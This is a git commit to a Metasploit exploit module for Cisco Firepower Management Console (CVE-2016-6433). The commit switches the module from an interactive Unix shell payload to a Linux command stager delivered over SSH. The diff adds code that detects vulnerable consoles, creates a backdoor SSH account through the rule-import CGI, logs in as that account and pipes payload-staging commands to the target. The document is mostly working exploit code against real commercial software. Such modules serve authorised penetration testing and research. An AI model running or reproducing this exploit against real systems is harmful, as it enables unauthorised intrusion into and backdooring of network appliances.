Use Linux payloads instead of cmd/unix/interact

wchen-r7 · wchen-r7 · commit 74cea5dd0441 · 2017-01-09T11:11:17.000-06:00
As of now, cmd/unix/interact causes msfconsole to freeze, so
we can't use this.
diff --git a/modules/exploits/linux/http/cisco_firepower_useradd.rb b/modules/exploits/linux/http/cisco_firepower_useradd.rb
@@ -4,13 +4,12 @@
 ##
 
 require 'msf/core'
-require 'net/ssh/command_stream'
 
 class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::HttpClient
-  include Msf::Auxiliary::CommandShell
+  include Msf::Exploit::CmdStager
   include Msf::Exploit::Remote::SSH
 
   def initialize(info={})
@@ -33,21 +32,15 @@ def initialize(info={})
           [ 'CVE', '2016-6433' ],
           [ 'URL', 'https://blog.korelogic.com/blog/2016/10/10/virtual_appliance_spelunking' ]
         ],
-      'Platform'       => 'unix',
-      'Arch'           => ARCH_CMD,
+      'Platform'       => 'linux',
+      'Arch'           => ARCH_X86,
       'Targets'        =>
         [
           [ 'Cisco Firepower Management Console 6.0.1 (build 1213)', {} ]
         ],
       'Privileged'     => false,
       'DisclosureDate' => 'Oct 10 2016',
-      'Payload'        =>
-        {
-          'Compat' => {
-            'PayloadType'    => 'cmd_interact',
-            'ConnectionType' => 'find'
-          }
-        },
+      'CmdStagerFlavor'=> %w{ echo },
       'DefaultOptions' =>
         {
           'SSL'        => 'true',
@@ -69,6 +62,40 @@ def initialize(info={})
   end
 
   def check
+    # For this exploit to work, we need to check two services:
+    # * HTTP - To create the backdoor account for SSH
+    # * SSH  - To execute our payload
+
+    vprint_status('Checking Cisco Firepower Management console...')
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri'    => normalize_uri(target_uri.path, '/img/favicon.png?v=6.0.1-1213')
+    })
+
+    if res && res.code == 200
+      vprint_status("Console is found.")
+      vprint_status("Checking SSH service.")
+      begin
+        ::Timeout.timeout(datastore['SSH_TIMEOUT']) do
+          Net::SSH.start(rhost, 'admin',
+            port: datastore['SSHPORT'],
+            password: Rex::Text.rand_text_alpha(5),
+            auth_methods: ['password'],
+            non_interactive: true
+          )
+        end
+      rescue Timeout::Error
+        vprint_error('The SSH connection timed out.')
+        return Exploit::CheckCode::Unknown
+      rescue Net::SSH::AuthenticationFailed
+        # Hey, it talked. So that means SSH is running.
+        return Exploit::CheckCode::Appears
+      rescue Net::SSH::Exception => e
+        vprint_error(e.message)
+      end
+    end
+
+    Exploit::CheckCode::Safe
   end
 
   def get_sf_action_id(sid)
@@ -99,7 +126,7 @@ def get_sf_action_id(sid)
   def create_ssh_backdoor(sid, user, pass)
     uri          = normalize_uri(target_uri.path, 'DetectionPolicy/rules/rulesimport.cgi')
     sf_action_id = get_sf_action_id(sid)
-    sh_name      = "#{Rex::Text.rand_text_alpha(6)}.sh"
+    sh_name      = 'exploit.sh'
 
     print_status("Attempting to create an SSH backdoor as #{user}:#{pass}")
 
@@ -193,7 +220,32 @@ def do_login
     nil
   end
 
-  def get_ssh_session(user, pass)
+  def execute_command(cmd, opts = {})
+    @first_exec = true
+    cmd.gsub!(/\/tmp/, '/usr/tmp')
+
+    # Weird hack for the cmd stager.
+    # Because it keeps using > to write the payload.
+    if @first_exec
+      @first_exec = false
+    else
+      cmd.gsub!(/>>/, ' > ')
+    end
+
+    begin
+      Timeout.timeout(3) do
+        @ssh_socket.exec!("#{cmd}\n")
+        vprint_status("Executing #{cmd}")
+      end
+    rescue Timeout::Error
+      fail_with(Failure::Unknown, 'SSH command timed out')
+    rescue Net::SSH::ChannelOpenFailed
+      print_status('Trying again due to Net::SSH::ChannelOpenFailed (sometimes this happens)')
+      retry
+    end
+  end
+
+  def init_ssh_session(user, pass)
     print_status("Attempting to log into SSH as #{user}:#{pass}")
 
     factory = ssh_socket_factory
@@ -212,28 +264,10 @@ def get_ssh_session(user, pass)
     begin
       ssh = nil
       ::Timeout.timeout(datastore['SSH_TIMEOUT']) do
-        ssh = Net::SSH.start(rhost, user, opts)
+        @ssh_socket = Net::SSH.start(rhost, user, opts)
       end
-    rescue Rex::ConnectionError
-      return
-    rescue Net::SSH::Disconnect, ::EOFError => e
-      print_error "SSH - #{e.message}"
-      return
-    rescue ::Timeout::Error
-      print_error "SSH - Timed out during negotiation"
-      return
-    rescue Net::SSH::AuthenticationFailed
-      print_error "SSH - Failed authentication"
     rescue Net::SSH::Exception => e
-      elog("#{e.class} : #{e.message}\n#{e.backtrace * "\n"}")
-      print_error "SSH Error: #{e.class} : #{e.message}"
-      return
-    end
-
-    if ssh
-      conn = ::Net::SSH::CommandStream.new(ssh, '/bin/bash', true)
-      ssh = nil
-      handler(conn.lsock)
+      fail_with(Failure::Unknown, e.message)
     end
   end
 
@@ -248,7 +282,13 @@ def exploit
     create_ssh_backdoor(sid, new_user, new_pass)
 
     # Log into the SSH backdoor account
-    get_ssh_session(new_user, new_pass)
+    init_ssh_session(new_user, new_pass)
+
+    begin
+      execute_cmdstager({:linemax => 500})
+    ensure
+      @ssh_socket.close
+    end
   end
 
 end
